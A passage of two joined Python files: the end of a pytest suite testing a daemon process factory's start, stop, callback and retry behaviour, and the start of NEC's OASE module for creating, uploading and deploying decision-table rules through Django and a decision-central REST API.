def main():
procs = []
for idx in range({primary_childrend_count}):
proc = multiprocessing.Process(target=spin_children)
procs.append(proc)
proc.start()
while True:
try:
time.sleep(0.25)
except KeyboardInterrupt:
break
# We're not terminating child processes on purpose. Our code should handle it.
# Support for windows test runs
if __name__ == '__main__':
multiprocessing.freeze_support()
main()
""".format(
shebang=sys.executable,
primary_childrend_count=primary_childrend_count,
secondary_children_count=secondary_children_count,
),
executable=True,
)
if not platform.is_windows():
factory_kwargs = dict(script_name=script)
else: # pragma: is-windows
# Windows don't know how to handle python scripts directly
factory_kwargs = dict(script_name=sys.executable, base_script_args=[script])
daemon = Daemon(start_timeout=1, **factory_kwargs)
daemon.start()
daemon_pid = daemon.pid
# Make sure the daemon is terminated no matter what
request.addfinalizer(daemon.terminate)
# Allow the script to start
time.sleep(PROCESS_START_TIMEOUT)
assert psutil.pid_exists(daemon_pid)
proc = psutil.Process(daemon_pid)
children = proc.children(recursive=True)
request.addfinalizer(functools.partial(kill_children, children))
assert len(children) == primary_childrend_count + (
primary_childrend_count * secondary_children_count
)
# Pretend the parent process died.
proc.kill()
time.sleep(0.5)
# We should should still be able to terminate all child processes
daemon.terminate()
assert psutil.pid_exists(daemon_pid) is False
psutil.wait_procs(children, timeout=3)
for child in list(children):
if psutil.pid_exists(child.pid):
continue
children.remove(child)
assert not children, "len(children)=={} != 0\n{}".format(
len(children), pprint.pformat(children)
)
@pytest.mark.parametrize("start_timeout", [0.1, 0.3])
def test_started_context_manager(request, tempfiles: Tempfiles, start_timeout: float):
script = tempfiles.makepyfile(
r"""
# coding=utf-8
import sys
import time
import multiprocessing
def main():
time.sleep(3)
sys.stdout.write("Done!\n")
sys.stdout.flush()
sys.exit(0)
# Support for windows test runs
if __name__ == '__main__':
multiprocessing.freeze_support()
main()
""",
executable=True,
)
daemon = Daemon(
script_name=sys.executable,
base_script_args=[script],
start_timeout=2,
max_start_attempts=1,
check_ports=[12345],
)
# Make sure the daemon is terminated no matter what
request.addfinalizer(daemon.terminate)
with pytest.raises(FactoryNotStarted) as exc:
daemon.start(start_timeout=start_timeout)
match = re.search(r"which took (?P<seconds>.*) seconds", str(exc.value))
assert match
# XXX: Revisit logic
# seconds = float(match.group("seconds"))
# Must take at least start_timeout to start
# assert seconds > start_timeout
# Should not take more than start_timeout + 0.3 to start and fail
# assert seconds < start_timeout + 0.3
# And using a context manager?
with pytest.raises(FactoryNotStarted) as exc:
started = None
with daemon.started(start_timeout=start_timeout):
# We should not even be able to set the following variable
started = False # pragma: no cover
assert started is None
match = re.search(r"which took (?P<seconds>.*) seconds", str(exc.value))
assert match
# XXX: Revisit logic
# seconds = float(match.group("seconds"))
# Must take at least start_timeout to start
# assert seconds > start_timeout
# Should not take more than start_timeout + 0.3 to start and fail
# assert seconds < start_timeout + 0.3
@pytest.fixture
def factory_stopped_script(tempfiles):
return tempfiles.makepyfile(
r"""
# coding=utf-8
import os
import sys
import time
import socket
import multiprocessing
def main():
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(('127.0.0.1', 12345))
sock.listen(5)
try:
while True:
connection, address = sock.accept()
connection.close()
except (KeyboardInterrupt, SystemExit):
pass
finally:
sock.close()
sys.exit(0)
# Support for windows test runs
if __name__ == '__main__':
multiprocessing.freeze_support()
main()
""",
executable=True,
)
def test_stopped_context_manager_raises_FactoryNotRunning(request, factory_stopped_script):
daemon = Daemon(
script_name=sys.executable,
base_script_args=[factory_stopped_script],
start_timeout=3,
max_start_attempts=1,
check_ports=[12345],
)
# Make sure the daemon is terminated no matter what
request.addfinalizer(daemon.terminate)
with pytest.raises(FactoryNotRunning):
with daemon.stopped():
pass # pragma: no cover
def test_stopped_context_manager(request, factory_stopped_script):
daemon = Daemon(
script_name=sys.executable,
base_script_args=[factory_stopped_script],
start_timeout=3,
max_start_attempts=1,
check_ports=[12345],
)
# Make sure the daemon is terminated no matter what
request.addfinalizer(daemon.terminate)
with daemon.started():
assert daemon.is_running()
with daemon.stopped():
assert daemon.is_running() is False
assert daemon.is_running()
@attr.s
class DaemonCallbackCounter:
before_start_callback_counter = attr.ib(default=0) # type: int
after_start_callback_counter = attr.ib(default=0) # type: int
before_terminate_callback_counter = attr.ib(default=0) # type: int
after_terminate_callback_counter = attr.ib(default=0) # type: int
def before_start_callback(self):
self.before_start_callback_counter += 1
def after_start_callback(self):
self.after_start_callback_counter += 1
def before_terminate_callback(self):
self.before_terminate_callback_counter += 1
def after_terminate_callback(self):
self.after_terminate_callback_counter += 1
@attr.s
class DaemonContextCallbackCounter:
daemon = attr.ib() # type: Daemon
before_start_callback_counter = attr.ib(default=0) # type: int
after_start_callback_counter = attr.ib(default=0) # type: int
before_stop_callback_counter = attr.ib(default=0) # type: int
after_stop_callback_counter = attr.ib(default=0) # type: int
def before_start_callback(self, daemon):
assert daemon is self.daemon
self.before_start_callback_counter += 1
def after_start_callback(self, daemon):
assert daemon is self.daemon
self.after_start_callback_counter += 1
def before_stop_callback(self, daemon):
assert daemon is self.daemon
self.before_stop_callback_counter += 1
def after_stop_callback(self, daemon):
assert daemon is self.daemon
self.after_stop_callback_counter += 1
def test_daemon_callbacks(request, factory_stopped_script):
daemon = Daemon(
script_name=sys.executable,
base_script_args=[factory_stopped_script],
start_timeout=3,
max_start_attempts=1,
check_ports=[12345],
)
callbacks = DaemonCallbackCounter()
daemon.before_start(callbacks.before_start_callback)
daemon.after_start(callbacks.after_start_callback)
daemon.before_terminate(callbacks.before_terminate_callback)
daemon.after_terminate(callbacks.after_terminate_callback)
stopped_callbacks = DaemonContextCallbackCounter(daemon)
# Make sure the daemon is terminated no matter what
request.addfinalizer(daemon.terminate)
daemon_started_once = False
with daemon.started():
daemon_started_once = daemon.is_running()
assert daemon_started_once is True
# Assert against the non context manager callbacks
assert callbacks.before_start_callback_counter == 1
assert callbacks.after_start_callback_counter == 1
assert callbacks.before_terminate_callback_counter == 0
assert callbacks.after_terminate_callback_counter == 0
# Assert against the context manager callbacks
assert stopped_callbacks.before_stop_callback_counter == 0
assert stopped_callbacks.after_stop_callback_counter == 0
assert stopped_callbacks.before_start_callback_counter == 0
assert stopped_callbacks.after_start_callback_counter == 0
with daemon.stopped(
before_stop_callback=stopped_callbacks.before_stop_callback,
after_stop_callback=stopped_callbacks.after_stop_callback,
before_start_callback=stopped_callbacks.before_start_callback,
after_start_callback=stopped_callbacks.after_start_callback,
):
assert daemon.is_running() is False
# Assert against the context manager callbacks
assert stopped_callbacks.before_stop_callback_counter == 1
assert stopped_callbacks.after_stop_callback_counter == 1
assert stopped_callbacks.before_start_callback_counter == 0
assert stopped_callbacks.after_start_callback_counter == 0
# Assert against the non context manager callbacks
assert callbacks.before_start_callback_counter == 1
assert callbacks.after_start_callback_counter == 1
assert callbacks.before_terminate_callback_counter == 1
assert callbacks.after_terminate_callback_counter == 1
assert daemon.is_running()
# Assert against the context manager callbacks
assert stopped_callbacks.before_stop_callback_counter == 1
assert stopped_callbacks.after_stop_callback_counter == 1
assert stopped_callbacks.before_start_callback_counter == 1
assert stopped_callbacks.after_start_callback_counter == 1
# Assert against the non context manager callbacks
assert callbacks.before_start_callback_counter == 2
assert callbacks.after_start_callback_counter == 2
assert callbacks.before_terminate_callback_counter == 1
assert callbacks.after_terminate_callback_counter == 1
# Let's got through stopped again, the stopped_callbacks should not be called again
# because they are not passed into .stopped()
with daemon.stopped():
assert daemon.is_running() is False
assert daemon.is_running()
# Assert against the context manager callbacks
assert stopped_callbacks.before_stop_callback_counter == 1
assert stopped_callbacks.after_stop_callback_counter == 1
assert stopped_callbacks.before_start_callback_counter == 1
assert stopped_callbacks.after_start_callback_counter == 1
assert daemon_started_once is True
# Assert against the non context manager callbacks
assert callbacks.before_start_callback_counter == 3
assert callbacks.after_start_callback_counter == 3
assert callbacks.before_terminate_callback_counter == 3
assert callbacks.after_terminate_callback_counter == 3
@attr.s
class DaemonStartCheckCounter:
custom_start_check_1_callback_counter = attr.ib(default=0) # type: int
custom_start_check_2_callback_counter = attr.ib(default=0) # type: int
custom_start_check_3_callback_counter = attr.ib(default=0) # type: int
def custom_start_check_1_callback(self, timeout_at):
self.custom_start_check_1_callback_counter += 1
if self.custom_start_check_1_callback_counter > 2:
return True
return False
def custom_start_check_2_callback(self, timeout_at):
self.custom_start_check_2_callback_counter += 1
if self.custom_start_check_2_callback_counter > 2:
return True
raise Exception("Foo!")
def custom_start_check_3_callback(self, timeout_at):
self.custom_start_check_3_callback_counter += 1
time.sleep(1)
return False
def test_daemon_start_check_callbacks(request, factory_stopped_script):
daemon = Daemon(
script_name=sys.executable,
base_script_args=[factory_stopped_script],
start_timeout=3,
max_start_attempts=1,
check_ports=[12345],
)
callbacks = DaemonStartCheckCounter()
daemon.start_check(callbacks.custom_start_check_1_callback)
daemon.start_check(callbacks.custom_start_check_2_callback)
daemon_start_check_callbacks = daemon.get_start_check_callbacks()
with daemon.started():
# Both start callbacks should have run 3 times by now, at which
# time, they would have returned True
pass
assert callbacks.custom_start_check_1_callback_counter == 3
assert callbacks.custom_start_check_2_callback_counter == 3
# Assert that the list of callbacks is the same before running the start checks
assert daemon.get_start_check_callbacks() == daemon_start_check_callbacks
def test_daemon_no_start_check_callbacks(request, tempfiles: Tempfiles):
script = tempfiles.makepyfile(
r"""
# coding=utf-8
import sys
import time
import multiprocessing
def main():
time.sleep(3)
sys.stdout.write("Done!\n")
sys.stdout.flush()
sys.exit(0)
# Support for windows test runs
if __name__ == '__main__':
multiprocessing.freeze_support()
main()
""",
executable=True,
)
daemon = Daemon(
script_name=sys.executable,
base_script_args=[script],
start_timeout=2,
max_start_attempts=1,
)
# Remove the check ports callback
daemon._start_checks_callbacks.clear()
# Make sure the daemon is terminated no matter what
request.addfinalizer(daemon.terminate)
with daemon.started():
# Daemon started without running any start checks
pass
assert not daemon.get_start_check_callbacks()
def test_daemon_start_check_callbacks_factory_not_running(request, tempfiles: Tempfiles):
script = tempfiles.makepyfile(
r"""
# coding=utf-8
import sys
import time
import multiprocessing
def main():
time.sleep(2)
sys.stdout.write("Done!\n")
sys.stdout.flush()
sys.exit(0)
# Support for windows test runs
if __name__ == '__main__':
multiprocessing.freeze_support()
main()
""",
executable=True,
)
callbacks = DaemonStartCheckCounter()
daemon = Daemon(
script_name=sys.executable,
base_script_args=[script],
start_timeout=2,
max_start_attempts=1,
)
# Make sure the daemon is terminated no matter what
request.addfinalizer(daemon.terminate)
daemon.start_check(callbacks.custom_start_check_3_callback)
with pytest.raises(FactoryNotStarted):
daemon.start()
# Make sure the callback was called at least once
assert callbacks.custom_start_check_3_callback_counter > 1
def test_context_manager_returns_class_instance(tempfiles):
script = tempfiles.makepyfile(
r"""
# coding=utf-8
import sys
import time
import multiprocessing
def main():
while True:
try:
time.sleep(0.1)
except KeyboardInterrupt:
break
sys.stdout.write("Done!\n")
sys.stdout.flush()
sys.exit(0)
# Support for windows test runs
if __name__ == '__main__':
multiprocessing.freeze_support()
main()
""",
executable=True,
)
daemon = Daemon(
script_name=sys.executable,
base_script_args=[script],
start_timeout=1,
max_start_attempts=1,
)
# Without starting the factory
started = d = None
with pytest.raises(RuntimeError):
with daemon as d:
# We should not even be able to set the following variable
started = d.is_running() # pragma: no cover
assert d is None
assert started is None
# After starting the factory
started = False
daemon.start()
with daemon as d:
# We should not even be able to set the following variable
started = d.is_running()
assert d.is_running() is False
assert started is True
# By starting the factory and passing timeout directly
started = False
with daemon.started(start_timeout=1) as d:
# We should not even be able to set the following variable
started = d.is_running()
assert d.is_running() is False
assert started is True
# By starting the factory without any keyword arguments
started = False
with daemon.started() as d:
# We should not even be able to set the following variable
started = d.is_running()
assert d.is_running() is False
assert started is True
@pytest.mark.parametrize("max_start_attempts", [1, 2, 3])
def test_exact_max_start_attempts(tempfiles, caplog, max_start_attempts):
"""
This test asserts that we properly report max_start_attempts.
"""
script = tempfiles.makepyfile(
r"""
# coding=utf-8
import sys
import time
import multiprocessing
def main():
time.sleep(0.125)
sys.exit(1)
# Support for windows test runs
if __name__ == '__main__':
multiprocessing.freeze_support()
main()
""",
executable=True,
)
daemon = Daemon(
script_name=sys.executable,
base_script_args=[script],
start_timeout=0.1,
max_start_attempts=max_start_attempts,
check_ports=[12345],
)
with caplog.at_level(logging.INFO):
with pytest.raises(FactoryNotStarted) as exc:
daemon.start()
assert "confirm running status after {} attempts".format(max_start_attempts) in str(
exc.value
)
start_attempts = [
"Attempt: {} of {}".format(n, max_start_attempts) for n in range(1, max_start_attempts + 1)
]
for record in caplog.records:
if not record.message.startswith("Starting Daemon"):
continue
for idx, start_attempt in enumerate(list(start_attempts)):
if start_attempt in record.message:
start_attempts.pop(idx)
assert not start_attempts
|
oase_apply.py
|
# Copyright 2019 NEC Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
[概要]
ルールの作成更新削除アップロードを行う。
ルールファイルのDLを行う。
"""
import os
import django
import sys
import socket
import pytz
import datetime
import json
import base64
import threading
import subprocess
import re
import requests
import time
import zipfile
import traceback
my_path = os.path.dirname(os.path.abspath(__file__))
tmp_path = my_path.split('oase-root')
root_dir_path = tmp_path[0] + 'oase-root'
sys.path.append(root_dir_path)
os.environ['DJANGO_SETTINGS_MODULE'] = 'confs.frameworkconfs.settings'
django.setup()
from django.db import transaction
from django.db.models import Q
from django.conf import settings
from libs.commonlibs.oase_logger import OaseLogger
logger = OaseLogger.get_instance() # ロガー初期化
from libs.commonlibs.define import *
from libs.commonlibs.createxl import DecisionTableFactory
from libs.commonlibs.createxl import DecisionTableCustomizer
from libs.commonlibs.testrequest_createxl import TestRequestXlFactory
from libs.commonlibs.dt_component import DecisionTableComponent
from libs.commonlibs.aes_cipher import AESCipher
from libs.backyardlibs.backyard_common import disconnect
from web_app.models.models import RuleFile
from web_app.models.models import RuleType
from web_app.models.models import System
from web_app.models.models import User
from web_app.models.models import RuleManage
from web_app.models.models import DataObject
from web_app.models.models import AccessPermission
from web_app.templatetags.common import get_message
APPLY_LOCK = threading.Lock()
DOWNLOAD_LOCK = threading.Lock()
APPLY_USER_ID = -2140000003
def conv_tz(dt, tzname):
return dt.astimezone(pytz.timezone(tzname)).strftime('%Y-%m-%d %H:%M:%S.%f')
def make_send_data(data, need_keys=[], omit_keys=[]):
logger.logic_log('LOSI00001', 'need_keys: %s' % need_keys)
ret_data = data.copy()
if len(need_keys) > 0:
for k, v in ret_data.items():
if k not in need_keys:
omit_keys.append(k)
for k in omit_keys:
if k in ret_data:
ret_data.pop(k)
logger.logic_log('LOSI00002', 'None')
return ret_data
def create(request):
disconnect()
logger.logic_log('LOSI00001', request)
result = ''
msg = ''
# リクエストのパラメーター取得
uid = int(request['user_id'])
table_info = request['table_info']
data_objs = request['data_obj_info']
label_cnt = request['label_count']
lang = request['lang']
notificationInfo = request['notificationInfo']
type_name = table_info['rule_type_name']
summary = table_info['summary']
table_name = table_info['rule_table_name']
now = datetime.datetime.now(pytz.timezone('UTC'))
user = User.objects.get(user_id=uid)
dtcomp = DecisionTableComponent(table_name)
unknown_event_notification = notificationInfo['unknown_event_notification']
mail_address = notificationInfo['mail_address']
servicenow_driver_id = notificationInfo['servicenow_driver_id']
rule_type_id = 0
ret_info = {
'result': 'OK',
'msg': '',
}
try:
with transaction.atomic():
########################################
# DB保存
########################################
# ルール種別
rule_type = RuleType(
rule_type_name=type_name,
summary=summary,
rule_table_name=table_name,
generation_limit=3,
group_id=dtcomp.group_id,
artifact_id=dtcomp.artifact_id,
container_id_prefix_staging=dtcomp.contid_stg,
container_id_prefix_product=dtcomp.contid_prd,
label_count=label_cnt,
unknown_event_notification=unknown_event_notification,
mail_address=mail_address,
servicenow_driver_id=servicenow_driver_id,
last_update_timestamp=now,
last_update_user=user.user_name
)
rule_type.save(force_insert=True)
# データオブジェクト
data_obj_list = []
for dob in data_objs:
data_object = DataObject(
rule_type_id=rule_type.rule_type_id,
conditional_name=dob['conditional_name'],
label=dob['label'],
conditional_expression_id=int(dob['conditional_expression_id']),
last_update_timestamp=now,
last_update_user=user.user_name
)
data_obj_list.append(data_object)
if len(data_obj_list) > 0:
DataObject.objects.bulk_create(data_obj_list)
########################################
# RHDMコンポーネント作成
########################################
rule_type_id = rule_type.rule_type_id
dtcomp.make_component_all(rule_type_id)
########################################
# Excel作成
########################################
dt_fact = DecisionTableFactory(
rule_type_id,
dtcomp.rule_set,
dtcomp.table_name,
dtcomp.class_name,
dtcomp.fact_name,
dtcomp.get_dtable_path()
)
success_flg = dt_fact.create_decision_table()
if not success_flg:
msg = 'MOSJA03501'
logger.system_log('LOSM12021', 'rule_type_id: %s, rule_type_name: %s' % (rule_type_id, type_name))
raise Exception()
########################################
# Excel作成(TestRequest)
########################################
testreq_fact = TestRequestXlFactory(rule_type_id, dtcomp.table_name, dtcomp.get_dtable_path(), request)
success_flg = testreq_fact.create_testrequest_table()
if not success_flg:
msg = 'MOSJA03503'
logger.system_log('LOSM12053', 'rule_type_id: %s, rule_type_name: %s' % (rule_type_id, type_name))
raise Exception()
except FileExistsError as e:
# RHDMコンポーネント作成において、新規作成するルール種別のディレクトリが既に存在していた場合
logger.system_log('LOSM12051', 'traceback: %s' % traceback.format_exc())
ret_info = {
'result': 'NG',
'msg': 'MOSJA03502',
}
except Exception as e:
if rule_type_id > 0:
dtcomp.remove_component(rule_type_id)
if not msg:
msg = 'MOSJA03001'
logger.system_log('LOSM12007', 'traceback: %s' % traceback.format_exc())
ret_info = {
'result': 'NG',
'msg': msg,
}
logger.logic_log('LOSI00002', 'ret_info: %s' % ret_info)
return ret_info
def upload(request):
disconnect()
logger.logic_log('LOSI00001', 'ruletypeid: %s, filename: %s' % (request['ruletypeid'], request['filename']))
result = ''
msg = ''
errmsg = ''
userlog = 'user_id=' + str(request['upload_user_id'])
errlog_prefix = True
ret_info = {
'result': 'OK',
'msg': '',
}
try:
now = datetime.datetime.now(pytz.timezone('UTC'))
time_zone = settings.TIME_ZONE
now_tz = conv_tz(now, time_zone)
user = User.objects.get(user_id=request['upload_user_id'])
lang = user.get_lang_mode()
ruletypeid = int(request['ruletypeid'])
rulefile = None
rule_manage = None
try:
with transaction.atomic():
# ルールファイルDB登録
rulefile = RuleFile(
rule_type_id=ruletypeid,
rule_file_name=request['filename'],
last_update_timestamp=now,
last_update_user=user.user_name
)
rulefile.save(force_insert=True)
# ルール適用管理登録
rule_manage = RuleManage(
rule_type_id=ruletypeid,
request_type_id=STAGING,
rule_file_id=rulefile.pk,
system_status=RULE_STS_SYSTEM.UPLOAD,
operation_status=RULE_STS_OPERATION.STAGING_NOAPPLY,
last_update_timestamp=now,
last_update_user=user.user_name
)
rule_manage.save(force_insert=True)
except Exception as e:
ret_info = {
'result': 'NG',
'msg': 'MOSJA03101',
}
logger.system_log('LOSM12022', traceback.format_exc())
logger.logic_log('LOSI00002', ret_info)
return ret_info
# ルール種別情報取得
ruleType = RuleType.objects.get(rule_type_id=ruletypeid)
artifactid = ruleType.artifact_id
groupid = ruleType.group_id
dtcomp = DecisionTableComponent(ruleType.rule_table_name)
dtcomp.set_path(rule_path['rule_srcpath'], '%s%s/' % (rule_path['rule_rootpath'], ruletypeid))
srcpath = dtcomp.get_pom_path()
dstpath = '%s%s/%s/' % (request['rule_dstpath'], ruletypeid, rulefile.pk)
filepath = request['rule_filepath'] % (ruletypeid, rulefile.pk) + ruleType.rule_table_name + '/'
# kjar構築用ファイルをコピー
os.makedirs(dstpath, exist_ok=True)
if not os.path.exists(srcpath):
try:
with transaction.atomic():
rule_manage.system_status = RULE_STS_SYSTEM.UPLOAD_NG
rule_manage.last_update_timestamp = now
rule_manage.last_update_user = user.user_name
rule_manage.save(force_update=True)
except Exception as e:
errmsg = str(now_tz) + ' ' + userlog + ' ' + get_message('MOSJA03104', lang)
errmsg = errmsg + '\n' + str(now_tz) + ' ' + userlog + ' ' + str(e)
msg = 'MOSJA03104'
logger.system_log('LOSM12023',userlog)
raise Exception(errmsg)
errmsg = str(now_tz) + ' ' + userlog + ' ' + get_message('MOSJA03102', lang)
msg = 'MOSJA03102'
logger.system_log('LOSM12024', srcpath)
raise Exception(errmsg)
dtcomp.copy_tree(dstpath)
# ルールファイルの保存
os.makedirs(filepath, exist_ok=True)
filename = request['filename']
filedata = request['filedata']
filedata = base64.b64decode(filedata.encode('utf-8'))
with open(filepath + filename, 'wb') as fp:
fp.write(filedata)
# 保存したルールファイルのチェック
dtcomp.set_rule_type_id(ruletypeid)
errmsg_list = dtcomp.check_decision_table_file(filepath + filename, lang)
if len(errmsg_list) > 0:
errmsg += str(now_tz) + ' ' + userlog + ' ' + get_message('MOSJA03121', lang) + '\n'
for em in errmsg_list:
errmsg += str(now_tz) + ' ' + userlog + ' ' + em + '\n'
errlog_prefix = False
logger.user_log('LOSM12061')
raise Exception(errmsg)
except User.DoesNotExist:
ret_info = {
'result': 'NG',
'msg': 'MOSJA03101',
}
logger.system_log('LOSM12022', traceback.format_exc())
logger.logic_log('LOSI00002', ret_info)
return ret_info
except Exception as e:
rule_manage.system_status = RULE_STS_SYSTEM.UPLOAD_NG
rule_manage.last_update_timestamp = now
rule_manage.last_update_user = user.user_name
rule_manage.save(force_update=True)
errfilename = '%s_err.log' % (request['filename'].rsplit('.')[0])
errfilepath = dstpath + errfilename
errmsg = ''
if errlog_prefix:
errmsg = str(now_tz) + ' ' + userlog + ' ' + get_message('MOSJA03106', lang).replace('\n', '\n')
errmsg = errmsg + '\n' + str(now_tz) + ' ' + userlog + ' ' + str(e) + '\n'
else:
errmsg = str(e) + '\n'
if not os.path.exists(dstpath):
os.makedirs(dstpath, exist_ok=True)
with open(errfilepath, 'a', encoding='utf8') as f:
f.write(errmsg)
msg = 'MOSJA03007' if not msg else msg
ret_info = {
'result': 'NG',
'msg': msg,
}
logger.system_log('LOSM12025', traceback.format_exc())
logger.logic_log('LOSI00002', 'ret_info: %s' % ret_info)
return ret_info
ret_info.update(
msg='MOSJA03002',
ruletypeid=ruletypeid,
rule_file_id=rulefile.pk,
artifactid=artifactid,
groupid=groupid,
pompath=dstpath,
request_type_id=STAGING,
apply_user_id=request['upload_user_id'],
rule_manage_id=rule_manage.rule_manage_id
)
logger.logic_log('LOSI00002', 'ret_info: %s' % ret_info)
return ret_info
def apply_req(request):
disconnect()
logger.logic_log('LOSI00001', 'request: %s' % (request))
result = 'OK'
msg = ''
try:
ruletypeid = request['ruletypeid']
rulefileid = request['rule_file_id']
reqtypeid = request['request_type_id']
manageid = request['rule_manage_id']
now = datetime.datetime.now(pytz.timezone('UTC'))
user = User.objects.get(user_id=request['apply_user_id'])
# プロダクション環境以外のリクエストは拒否
if reqtypeid != PRODUCTION:
msg = 'MOSJA03202'
logger.system_log('LOSM12026', str(request['apply_user_id']), reqtypeid)
raise Exception()
# プロダクション環境データ作成処理
with transaction.atomic():
# ロック取得
ruleManageLock = RuleManage.objects.get(rule_manage_id=manageid)
# データ作成状況チェック
rcnt = RuleManage.objects.filter(
rule_type_id=ruleManageLock.rule_type_id,
request_type_id=ruleManageLock.request_type_id,
rule_file_id=ruleManageLock.rule_file_id,
operation_status=RULE_STS_OPERATION.PRODUCT
).count()
if rcnt > 0:
msg = 'MOSJA03201'
logger.system_log('LOSM12027',
str(request['apply_user_id']),
ruleManageLock.rule_type_id,
ruleManageLock.request_type_id,
ruleManageLock.rule_file_id)
raise Exception()
# プロダクション環境データ作成
ruleManage = RuleManage(
rule_type_id=ruletypeid,
request_type_id=reqtypeid,
rule_file_id=rulefileid,
system_status=RULE_STS_SYSTEM.PRODUCT,
operation_status=RULE_STS_OPERATION.PRODUCT_NOAPPLY,
last_update_timestamp=now,
last_update_user=user.user_name
)
ruleManage.save(force_insert=True)
request['rule_manage_id'] = ruleManage.rule_manage_id
except User.DoesNotExist:
result = 'NG'
msg = 'MOSJA32010'
logger.system_log('LOSM12068', traceback.format_exc())
except RuleManage.DoesNotExist:
result = 'NG'
msg = 'MOSJA03302'
logger.system_log('LOSM12035', str(request['apply_user_id']), manageid, traceback.format_exc())
except Exception as e:
result = 'NG'
msg = msg if msg else 'MOSJA03018'
logger.system_log('LOSM12069', traceback.format_exc())
ret_info = {
'result': result,
'msg': 'MOSJA03017' if result == 'OK' else msg,
}
return ret_info
def apply(request):
disconnect()
logger.logic_log('LOSI00001', 'request: %s' % (request))
try:
# データ取得
ruletypeid = request['ruletypeid']
groupid = request['groupid']
artifactid = request['artifactid']
rulefileid = request['rule_file_id']
reqtypeid = request['request_type_id']
manageid = request['rule_manage_id']
rulefile = RuleFile.objects.get(rule_file_id=rulefileid)
filename = '%s_err.log' % (rulefile.rule_file_name.rsplit('.')[0])
errfilepath = '%s%s/%s/%s' % (request['rule_dstpath'], ruletypeid, rulefileid, filename)
userlog = 'user_id=' + str(request['apply_user_id'])
msg = ''
data = {}
data['release-id'] = {}
now = datetime.datetime.now(pytz.timezone('UTC'))
time_zone = settings.TIME_ZONE
now_tz = conv_tz(now, time_zone)
user = User.objects.get(user_id=request['apply_user_id'])
lang = user.get_lang_mode()
ret_info = {
'result': 'OK',
'msg': msg,
}
if reqtypeid not in [PRODUCTION, STAGING]:
errmessage = str(now_tz) + ' ' + userlog + ' ' + get_message('MOSJA03206',
lang, reqtypeid=reqtypeid).replace('\n', '\n') + '\n'
with open(errfilepath, 'a', encoding='utf8') as f:
f.write(errmessage)
ret_info = {
'result': 'NG',
'msg': 'MOSJA03202'
}
logger.system_log('LOSM12026', str(request['apply_user_id']), reqtypeid)
logger.logic_log('LOSI00002', 'ret_info: %s' % ret_info)
return ret_info
with transaction.atomic():
ruleManageLock = RuleManage.objects.get(rule_manage_id=manageid)
if reqtypeid == PRODUCTION:
rcnt = RuleManage.objects.filter(
rule_type_id=ruleManageLock.rule_type_id,
request_type_id=ruleManageLock.request_type_id,
rule_file_id=ruleManageLock.rule_file_id,
operation_status=RULE_STS_OPERATION.PRODUCT
).count()
if rcnt > 0:
msg = 'MOSJA03201'
errmessage = str(now_tz) + ' ' + userlog + ' ' + get_message('MOSJA03201', lang)
logger.system_log('LOSM12027',
str(request['apply_user_id']),
ruleManageLock.rule_type_id,
ruleManageLock.request_type_id,
ruleManageLock.rule_file_id)
raise Exception(errmessage)
# コンテナID取得
rule_type = RuleType.objects.select_for_update().get(rule_type_id=ruletypeid)
# ルール適用管理検索
tmp_working_rule = RuleManage.objects.select_for_update().filter(
rule_type_id=ruletypeid, request_type_id=reqtypeid)
if reqtypeid == PRODUCTION:
tmp_working_rule = tmp_working_rule.filter(
system_status=RULE_STS_SYSTEM.PRODUCT_OK,
operation_status=RULE_STS_OPERATION.PRODUCT
)
elif reqtypeid == STAGING:
tmp_working_rule = tmp_working_rule.filter(
system_status=RULE_STS_SYSTEM.STAGING_OK,
operation_status__in=[
RULE_STS_OPERATION.STAGING_NOTYET,
RULE_STS_OPERATION.STAGING_VERIFY,
RULE_STS_OPERATION.STAGING_NG,
RULE_STS_OPERATION.STAGING
]
)
old_manage_ids = list(tmp_working_rule.values_list('rule_manage_id', flat=True))
# 適用対象となるルール適用管理情報を取得
ruleManage = RuleManage.objects.get(rule_manage_id=manageid)
if reqtypeid == PRODUCTION:
ContID = rule_type.container_id_prefix_product
oldContID = rule_type.current_container_id_product
elif reqtypeid == STAGING:
ContID = rule_type.container_id_prefix_staging
oldContID = rule_type.current_container_id_staging
# デプロイ実施
headers = {
'accept': 'application/json',
'content-type': 'application/json',
}
ContID = ContID + '_' + datetime.datetime.now(pytz.timezone('UTC')).strftime('%Y%m%d%H%M%S%f')
data['container-id'] = ContID
data['status'] = 'STARTED'
data['release-id']['group-id'] = groupid
data['release-id']['artifact-id'] = artifactid
data['release-id']['version'] = rulefileid
send_data = json.dumps(data)
send_data = send_data.encode()
PROTOCOL, IPADDRPORT, dmuser, dmpass = get_dm_conf()
HTTP = '%s://%s/decision-central/rest/controller/management/servers/default-kieserver/containers/%s' % (
PROTOCOL, IPADDRPORT, ContID)
response = requests.put(HTTP, headers=headers, data=send_data, auth=(dmuser, dmpass))
logger.system_log('LOSI12000', 'response: %s, ContID: %s' % (response, ContID))
# デプロイ失敗
if response.status_code != 201:
ret_info = {
'result': 'NG',
'msg': 'MOSJA03204',
}
# システム処理状態更新
# 適用異常終了
if reqtypeid == PRODUCTION:
ruleManage.system_status = RULE_STS_SYSTEM.PRODUCT_NG
elif reqtypeid == STAGING:
ruleManage.system_status = RULE_STS_SYSTEM.STAGING_NG
ruleManage.last_update_timestamp = now
ruleManage.last_update_user = user.user_name
ruleManage.save(force_update=True)
if response.status_code == 400:
msg = 'MOSJA03208'
errmessage = str(now_tz) + ' ' + userlog + ' ' + get_message('MOSJA03208', lang)
logger.system_log('LOSM12029', str(request['apply_user_id']), reqtypeid, ContID)
raise Exception(errmessage)
elif response.status_code == 404:
msg = 'MOSJA03209'
errmessage = str(now_tz) + ' ' + userlog + ' ' + get_message('MOSJA03209', lang)
logger.system_log('LOSM12030', str(request['apply_user_id']), reqtypeid, ContID)
raise Exception(errmessage)
else:
msg = 'MOSJA03210'
errmessage = str(now_tz) + ' ' + userlog + ' ' + get_message('MOSJA03210', lang)
logger.system_log('LOSM12031', str(request['apply_user_id']), reqtypeid, ContID)
raise Exception(errmessage)
logger.system_log('LOSM12028', str(request['apply_user_id']), reqtypeid, ContID)
# デプロイ成功
else:
# 現コンテナID更新
if reqtypeid == PRODUCTION:
